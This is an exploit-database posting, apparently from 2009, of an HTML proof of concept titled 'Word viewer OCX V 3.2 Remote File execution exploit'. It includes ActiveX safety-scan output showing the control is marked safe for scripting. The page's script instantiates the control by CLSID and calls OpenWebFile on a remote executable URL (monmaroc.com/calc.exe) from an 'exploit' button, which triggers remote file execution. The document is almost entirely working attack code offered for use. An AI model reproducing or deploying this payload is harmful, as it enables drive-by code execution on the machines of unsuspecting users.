Home / os / win10

wordviewer-exec.txt

Posted on 14 January 2009

<HTML> ---------------------------------------------------------- <br> Word viewer OCX V 3.2 Remote File execution exploit<br> ---------------------------------------------------------- <br> -----------------------------------<br> # By Mountassif Moad a.k.a Stack # -----------------------------------<br> <!-- v4 Team & evil finger Class OA GUID: {97AF4A45-49BE-4485-9F55-91AB40F22BF2} Number of Interfaces: 1 Default Interface: _DOA RegKey Safe for Script: True RegkeySafe for Init: True KillBitSet: False Report for Clsid: {97AF4A45-49BE-4485-9F55-91AB40F22BF2} RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data IPersist Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data --> <title>Word viewer OCX V 3.2 Remote File execution exploit</title> <BODY> <object id=Stack classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F22BF2}"></object> <SCRIPT> function Do_it() { File = "http://monmaroc.com/calc.exe" Stack.OpenWebFile(File) } </SCRIPT> <input language=JavaScript onclick=Do_it() type=button value="exploit"> </body> </HTML>

 

TOP